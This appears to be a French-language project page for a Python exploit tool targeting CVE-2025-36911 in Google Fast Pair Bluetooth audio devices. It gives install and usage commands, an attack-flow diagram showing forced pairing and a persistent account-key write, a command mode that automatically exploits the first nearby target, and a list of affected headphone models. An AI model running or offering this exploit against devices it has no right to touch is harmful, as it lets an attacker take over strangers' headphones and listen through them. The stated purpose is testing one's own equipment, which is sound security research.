
Exploit de la vulnérabilité CVE-2025-36911 en Python pour tester notre propre équipement
Outil d'exploitation rapide de la CVE-2025-36911 (Fast Pair) en Python pour tester notre équipement
Auteur : Sébastien Dudek (@FlUxIuS) @ Penthertz
Crédits : whisperpair.eu pour la découverte et cette superbe APK de @ZalexDev qui réduit le temps d'implémentation wpair-app
Uniquement pour des recherches de sécurité autorisées. Testez uniquement sur des appareils vous appartenant.
CVE-2025-36911 affecte les implémentations de Google Fast Pair sur des millions d'appareils audio Bluetooth.
Comportement normal : Les appareils ne devraient accepter les demandes d'appairage que lorsqu'ils sont en mode appairage (bouton enfoncé, boîtier ouvert, etc.)
Comportement vulnérable : Les appareils acceptent les demandes d'appairage par clé (KBP) à tout moment, même lorsqu'ils sont en veille ou déjà appairés.
# Install
pip install bleak cryptography
git clone https://github.com/Penthertz/CVE-2025-36911-exploit.git
cd CVE-2025-36911-exploit
# Scan for targets
python3 whisperpair-cli.py scan
# Test if vulnerable
python3 whisperpair-cli.py test AA:BB:CC:DD:EE:FF
# Exploit
python3 whisperpair-cli.py exploit --quick
┌─────────────────────────────────────────────────────────────┐
│ ATTACKER VULNERABLE DEVICE │
│ │
│ 1. BLE Scan ─────────────────────► Fast Pair Advertisement │
│ (Find target) (Model ID visible) │
│ │
│ 2. Connect ──────────────────────► GATT Connection │
│ │
│ 3. KBP Request ──────────────────► Key-Based Pairing Char │
│ (Should be rejected ✗ NOT REJECTED! │
│ when not in pairing mode) (CVE-2025-36911) │
│ │
│ 4. Parse Response ◄────────────── BR/EDR Address │
│ │
│ 5. Write Account Key ────────────► Account Key Char │
│ (Persistent access) ✓ ACCEPTED │
│ │
│ 6. Classic BT Pair ──────────────► Audio Profiles (A2DP) │
│ (Game over) │
└─────────────────────────────────────────────────────────────┘
L'outil essaie plusieurs stratégies automatiquement :
Testés comme vulnérables (vérifiez les mises à jour du firmware) :
| Commande | Description |
|---|
scan | Scan BLE en direct pour les appareils Fast Pair |
scan -a | Scanner tous les appareils BLE |
info <addr> | Afficher les services/caractéristiques GATT |
test <addr> | Vérification de vulnérabilité non invasive |
exploit <addr> | Chaîne d'exploitation complète |
exploit -q | Scan automatique + exploitation de la première cible |
| Marque | Modèles |
|---|
| Pixel Buds Pro 2 (mais reçoit des mises à jour assez rapidement avec les téléphones Pixel) | |
| Sony | WH-1000XM4, WH-1000XM5/XM6, LinkBuds S, WH-CH520 |
| JBL | JBL TUNE BEAM |
| Anker | Soundcore Liberty 4 NC |
| Jabra | Elite 8 Active |
| + bien d'autres | whisperpair.eu |